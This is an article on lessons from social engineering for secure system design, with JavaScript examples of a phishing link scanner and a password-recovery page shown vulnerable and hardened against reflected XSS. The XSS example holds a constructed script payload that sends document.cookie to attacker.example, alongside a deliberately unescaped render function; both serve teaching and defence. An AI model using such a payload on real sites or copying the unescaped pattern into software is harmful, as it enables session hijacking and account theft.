3 Lessons on Secure System Design From Social Engineering Attacks

Engineering is often associated with infrastructure, machines, computers and software. But there is one other kind of engineering many people have already encountered without realising it: social engineering, the kind of engineering most of us frown upon. For years, social engineering has played a crucial role in the global cyber threat landscape; by one widely cited estimate, around 98 percent of cyber-attacks rely on it.

Social engineering deserves the bad rap it has, but it can also offer lessons on designing secure systems. The constant evolution and the endless new approaches cybercriminals employ to deceive people show that ingenuity has no limits when people are determined to achieve something. Social engineering can teach software engineers and system designers a few things about ensuring security and privacy.

Do not assume everyone is smart enough not to fall for common, old tricks
How does phishing work? This form of social engineering tricks someone into submitting or revealing sensitive information through deceptive interfaces or guided processes. A basic example is a link (sent via email, chat, or text message) that leads to a web page imitating the appearance and behaviour of a web app or online service such as a social network, an online bank, or a FinTech site.

It is a common attack that could easily be avoided if everyone had the habit of examining links before clicking them and verifying the websites they submit their details to. Regrettably, many still fall victim to this basic phishing tactic. According to Cisco’s Cybersecurity Threat Trends report for 2021, around 90 percent of data breaches were attributed to phishing.

This is why anti-phishing controls are necessary. Tools that inspect links and warn users before a risky action help keep persistent phishing attacks at bay. Mechanisms that intervene against phishing matter even when most people are already aware of the nature and risks of social engineering, because awareness alone does not stop a tired or hurried user from clicking.
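As an added example (not from the original article), here are a few of the heuristic checks such a link scanner can apply before the user clicks: lookalike registrable domains, a brand name buried inside an unrelated host, punycode hostnames, raw IP hosts, credentials in the URL, and link text that names a different domain than the real destination. The brand list, the sample links and the edit-distance threshold are constructed for this illustration.

```javascript
// Added example, not from the original article: heuristic link checks of the
// kind an anti-phishing scanner runs before a click. KNOWN_BRANDS, the sample
// links and the distance threshold are constructed for illustration.

const KNOWN_BRANDS = ["paypal.com", "facebook.com", "chase.com"];

// Levenshtein edit distance, used to spot lookalike registrable domains
// such as paypa1.com or chase.co.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1,
        dp[i][j - 1] + 1,
        dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1),
      );
    }
  }
  return dp[a.length][b.length];
}

// Crude "registrable domain": the last two labels. Good enough for the demo;
// a real scanner would consult the Public Suffix List (co.uk, com.au, ...).
function registrableDomain(hostname) {
  return hostname.split(".").slice(-2).join(".");
}

// Inspect one link. `href` is where the link really goes; `displayText` is
// what the user sees (anchor text, or the visible URL in a message).
function inspectLink(href, displayText) {
  const findings = [];
  let url;
  try {
    url = new URL(href);
  } catch {
    return { risky: true, findings: ["unparseable URL"] };
  }
  const host = url.hostname; // WHATWG URL parsing yields the ASCII (punycode) form

  if (host.split(".").some((label) => label.startsWith("xn--"))) {
    findings.push("internationalized (punycode) hostname: possible homograph");
  }
  if (/^\d{1,3}(\.\d{1,3}){3}$/.test(host)) findings.push("raw IP address host");
  if (url.protocol !== "https:") findings.push("not HTTPS");
  if (url.username) findings.push("userinfo in URL (brand.com@evil.example trick)");

  const reg = registrableDomain(host);
  for (const brand of KNOWN_BRANDS) {
    if (reg === brand) continue; // the genuine site
    const brandLabel = brand.split(".")[0];
    // Heuristic, will also fire on e.g. "purchase.example" for "chase".
    if (host.includes(brandLabel)) {
      findings.push(`brand "${brandLabel}" inside non-brand host ${host}`);
    }
    const d = editDistance(reg, brand);
    if (d > 0 && d <= 2) findings.push(`lookalike of ${brand} (edit distance ${d})`);
  }

  // Link text that shows one domain while the href goes somewhere else.
  if (displayText) {
    const m = displayText.match(/[a-z0-9.-]+\.[a-z]{2,}/i);
    if (m && registrableDomain(m[0].toLowerCase()) !== reg) {
      findings.push(`display text says ${m[0]} but link goes to ${host}`);
    }
  }
  return { risky: findings.length > 0, findings };
}

// Constructed sample links a scanner might see in a message.
const SAMPLE_LINKS = [
  ["https://www.paypal.com/signin", "https://www.paypal.com/signin"],
  ["https://www.paypa1.com/signin", "PayPal"],
  ["http://chase.com@198.51.100.7/", "https://chase.com"],
  ["https://xn--pypal-4ve.com/login", null], // punycode of "pаypal.com" with Cyrillic а
];

for (const [href, text] of SAMPLE_LINKS) {
  const r = inspectLink(href, text);
  console.log(r.risky ? "RISKY " : "ok    ", href, r.findings);
}
```

Run it with `node` and the first link comes back clean while the other three are flagged. None of these checks is conclusive on its own; a production scanner combines them with reputation feeds and, ideally, just blocks the click behind a warning rather than trusting the user to read the findings.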

At the height of the COVID-19 pandemic, for example, phishing attempts that promised money from a so-called “global empowerment fund” managed to victimise thousands. This is no different from the old 419 or Nigerian scams, yet many still fell for it. Pandemic-induced desperation was likely a big factor. According to one cybersecurity firm, some people even believed a version of this pandemic 419 scam that purportedly came from the “Chief Justice of Canada.”

It may seem heavy-handed to require multi-factor authentication, or tediously repetitive to put security reminders in apps, but the benefits overwhelmingly outweigh the inconvenience, especially for apps that handle financial transactions. There is a reason Facebook, by default, alerts users when a login from an unknown device is made, and why banks and FinTech companies keep asking for one-time passwords (OTPs) to confirm transactions. Two caveats for designers: forced periodic password changes, which banks also commonly impose, are a weaker control, and NIST SP 800-63B advises against routine rotation unless there is evidence of compromise because it pushes users toward predictable variations; and SMS or app OTPs can themselves be phished by a real-time relay page, whereas origin-bound authenticators such as FIDO2/WebAuthn keys refuse to sign for a lookalike domain, which is exactly the protection a user who has already been fooled by the link needs.

Simple threats evolve into something more technical and harder to stop

Many already understand that most social engineering attacks depend on how people respond to the bait they are presented with. The attack succeeds when it elicits the desired action from the target. Those who click on links sent to their email or instant messages and then log in to a fake form, for example, expose their credentials to theft. Had they examined the link first and ignored it because it looked suspicious, they would have avoided becoming victims of phishing.

Unfortunately, checking the link is not always enough. Some attacks have a technical component most people are unlikely to notice. A password-recovery phishing attack, for instance, may actually send the victim to the real password-recovery page of the genuine site. The link, however, carries a payload in a URL parameter that the page reflects back into its own HTML, so a malicious script runs in the background, in the real site’s origin, and can hijack the browser’s session cookie.

This session-hijacking scheme is a reflected cross-site scripting (XSS) attack. It exploits a vulnerability in the application: user-supplied input (here, a URL parameter) is inserted into the page without proper encoding, so the attacker can inject JavaScript, HTML, or other markup. When the victim opens the crafted link, the injected code executes in the victim’s browser with the full privileges of the vulnerable site’s origin. Strictly speaking the attacker does not bypass the browser’s same-origin policy; the script runs inside the trusted origin, so the policy works in the attacker’s favour. The script can read the page’s DOM and any cookie not marked HttpOnly, and can perform actions as the logged-in user, so whatever that user can do in the application is now available to the attacker, and further access may follow from there.

This is why social engineering cannot be fully addressed by cybersecurity education alone. The right defenses also call for security controls that prevent and detect threats such as cross-site scripting: contextual output encoding, a Content Security Policy, HttpOnly and SameSite attributes on session cookies, and testing that finds reflected input before attackers do.
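As an added example (not from the original article), the snippet below shows the password-recovery scenario described above in miniature: a page that reflects the requested account name into its HTML unescaped, the same page with output encoding, and the response headers that limit what an injected script could do even if one ran. The route, the cookie name, the header values and the sample payload are constructed for this illustration.

```javascript
// Added example, not from the original article: a password-recovery page
// rendered first with a reflected XSS flaw and then hardened. The query
// parameter name, cookie name, CSP and attacker payload are constructed.

// Minimal HTML entity encoding for text placed inside an element body or a
// double-quoted attribute. Encodes the five characters that matter in HTML.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// VULNERABLE: the `user` query parameter is dropped straight into the page.
// A phishing link such as /recover?user=<script>...</script> therefore runs
// attacker JavaScript inside the genuine site's origin (reflected XSS).
function renderRecoveryPageVulnerable(query) {
  const user = new URLSearchParams(query).get("user") ?? "";
  return `<h1>Reset password</h1>
<p>We will email a reset link to the address on file for ${user}.</p>`;
}

// HARDENED: same page, value HTML-encoded before interpolation, so the
// payload is displayed as text rather than parsed as markup.
function renderRecoveryPageSafe(query) {
  const user = new URLSearchParams(query).get("user") ?? "";
  return `<h1>Reset password</h1>
<p>We will email a reset link to the address on file for ${escapeHtml(user)}.</p>`;
}

// Headers the hardened version sends with the page. HttpOnly keeps
// document.cookie from exposing the session even if a script does run,
// SameSite=Lax limits cross-site sending, and the CSP blocks inline
// scripts and exfiltration to hosts other than the site itself.
function securityHeaders(sessionId) {
  return {
    "Set-Cookie": `session=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Lax`,
    "Content-Security-Policy":
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    "X-Content-Type-Options": "nosniff",
  };
}

// The attacker's link: the reflected script sends document.cookie to a
// host the attacker controls. Constructed payload for the demo.
const PHISHING_QUERY =
  "?user=" +
  encodeURIComponent(
    '<script>new Image().src="https://attacker.example/c?"+encodeURIComponent(document.cookie)</script>',
  );

// Does the rendered HTML contain a live <script> element?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

console.log("vulnerable page runs payload:", containsScriptTag(renderRecoveryPageVulnerable(PHISHING_QUERY)));
console.log("hardened page runs payload:  ", containsScriptTag(renderRecoveryPageSafe(PHISHING_QUERY)));
console.log(securityHeaders("opaque-random-id")["Set-Cookie"]);
```

Two design points. Encoding must match the context: `escapeHtml` is correct for element text and quoted attributes but not for a value dropped into a `<script>` block, a URL, or an inline event handler, each of which needs its own encoder or, better, a templating engine that escapes by default. And the headers are defence in depth, not a substitute: with `HttpOnly` the payload above gets nothing from `document.cookie`, but a script running in the origin can still issue requests as the user, which is why the reflected input has to be fixed at the source.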

There are always new ways to exploit human weaknesses when it comes to cybersecurity

Humans are still the weakest link in the cybersecurity chain. This old expression still holds true. It is difficult to instil habits that improve security, and equally hard to remove risky ones, such as clicking on links or downloads without a second thought.

This problem is aggravated by the never-ending “ingenuity” of cybercriminals. They keep finding new ways to tap into human nature and get people to sabotage their own security.

Examples of these new ways of exploiting human weakness are listed in CSO Online editor Michael Hill’s piece on the strangest social engineering attacks of 2021. One involves the threat actor known as TA453, which spent significant time building relationships with European professors and policy experts. The goal was to steal the credentials of reputable people, or people with authority, for use in later cybercrimes.

Another notable attack involved posers introducing themselves to soccer clubs as sports agents. They gained the trust of young players and fans to make it easier to convince the targets to download videos and other files laced with the Formbook malware. This information stealer is often sold on dark web markets as a malware-as-a-service offering.

Cybercriminals are people themselves, and they know how other people think and behave. Given this, the quest to design secure systems never ends, because attackers will come up with a new strategy as soon as they realise their previous schemes no longer work or are being detected by automated controls. Again, this is not an excuse to skip building secure apps or designing secure systems. It is a reminder of the need for continuous improvement and for shared cyber threat intelligence.

Summing it all up
It is true that the biggest defense against social engineering is cybersecurity education. Everyone should be taught proper cyber hygiene and be able to practise precautionary measures, and it is crucial to stay up to date with the latest social engineering tactics. The success of a social engineering attack ultimately rests on the people being attacked. However, this does not mean that all effort should go into education and monitoring people.

There are things app developers and system builders can do to reduce the odds that phishing and other social engineering attacks succeed. Continuous testing of security controls, for one, helps detect vulnerabilities such as cross-site scripting that sophisticated attacks bundle with social engineering. Phishing-resistant authentication and hardened session handling, in turn, limit what an attacker gains on the occasions when a user does click.